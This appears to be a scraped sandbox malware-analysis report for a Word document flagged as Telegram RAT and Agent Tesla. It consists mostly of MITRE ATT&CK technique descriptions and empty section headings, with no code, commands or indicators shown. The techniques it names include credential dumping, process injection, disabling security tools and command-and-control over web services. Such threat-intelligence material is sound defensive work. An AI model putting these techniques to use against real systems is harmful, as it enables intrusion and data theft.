Instruction ID: 5b5098677b40300073c2af89cc1ac9f2ddd2f05ab48410400b4760e014383332
Opcode Fuzzy Hash: e9ab2af116acad88b2db5f750754393ab3abfb2696be9cc80a4acb4083f506f4
Instruction Fuzzy Hash: BCA13AB4A04218CFDB649B20C8546EDB7B2BF88205F6085AAD609E3350EF749D86CF65

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report PO141021.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Code Manipulations

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre